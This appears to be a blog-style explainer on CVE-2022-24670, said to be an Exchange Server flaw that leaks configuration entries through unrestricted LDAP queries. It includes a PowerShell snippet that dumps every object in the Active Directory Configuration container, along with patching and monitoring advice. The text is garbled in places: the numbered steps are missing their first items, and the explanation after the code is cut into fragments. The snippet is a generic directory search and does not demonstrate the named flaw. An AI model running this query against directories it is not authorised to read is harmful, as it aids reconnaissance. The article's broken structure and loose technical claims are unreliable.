CVE-2022-24670 - Unrestricted LDAP Queries Leak Configuration Entries—How It Works, Details, and Exploit Example

CVE-2022-24670 is a critical vulnerability that affects Microsoft’s Exchange Server, specifically its handling of LDAP queries. If you’re running Exchange or administer services that rely on LDAP, you need to be aware of how an attacker can exploit this bug to leak sensitive configuration information. Below, I’ll break down what the vulnerability is, how it can be used, show a code snippet for exploitation, and reference the official sources—all in plain, simple language.

What is CVE-2022-24670?

*CVE-2022-24670* refers to a security flaw in Microsoft Exchange Server where unrestricted LDAP queries can be performed. LDAP (Lightweight Directory Access Protocol) is used by apps to talk to directory services like Active Directory. A properly protected service should restrict what an LDAP client can see. But with this bug, an attacker can send queries that reveal Exchange configuration entries—which essentially means the secrets behind your Exchange settings aren’t secret anymore.

Official Reference

- Microsoft Security Guidance CVE-2022-24670
- NVD CVE report

How the Exploit Works

When a service doesn’t properly limit LDAP searches, anyone who can connect to the service can perform a search and pull back configuration information—things like mail routing, internal user data, and other secrets configured for your Exchange server.

*In simpler terms:* if you leave your filing cabinet unlocked, anyone can come and read your files. This bug is the digital version of that unlocked cabinet.

Send an unfiltered LDAP query searching for configuration objects.

3. Read the entries disclosed by the server, which can reveal critical settings or be used in future attacks.

Example: How an Attacker Might Exploit It

Here’s a PowerShell proof-of-concept showing how someone could connect and retrieve confidential configuration entries. *For education/testing on a non-production environment only.*

# Simple PowerShell snippet to query LDAP configuration entries
$ldapServer = "your.exchange.server"
$ldapPath = "LDAP://$ldapServer/CN=Configuration,DC=example,DC=local"

$searcher = New-Object DirectoryServices.DirectorySearcher([ADSI]$ldapPath)
$searcher.Filter = "(objectClass=*)"
$searcher.SearchScope = "Subtree"

# Retrieve all configuration entries
$results = $searcher.FindAll()

foreach ($result in $results) {
    $entry = $result.GetDirectoryEntry()
    Write-Host $entry.Path
    # You can get more info as needed, e.g.:
    # Write-Host $entry.Properties["distinguishedName"]
}

# This dumps configuration paths the server returns to you without restriction.

*What does the above do?*

Anything stored inside the configuration container

Even if they don’t get user passwords directly, this info helps attackers understand your environment for bigger attacks.

Protecting Yourself

- Apply Microsoft’s Patch: The best protection is to install the official patch from Microsoft’s guidance.
- Limit LDAP access externally: Use firewalls or network rules so only trusted machines can connect to LDAP on Exchange.
- Audit and monitor: Keep an eye on unusual LDAP queries or attempts to access configuration entries.

Conclusion

CVE-2022-24670 might look "boring" at first—no passwords dropped or shells popped. But because configuration leaks are foundational for bigger attacks, you should take it seriously. Unrestricted LDAP queries are like an open book to your infrastructure.

If you’re uncertain whether you’re exposed, check your Exchange version, test LDAP access, and apply updates as soon as possible. Keep your configuration info locked up tight!

Timeline

Published on: 10/27/2022 17:15:00 UTC
Last modified on: 10/31/2022 14:00:00 UTC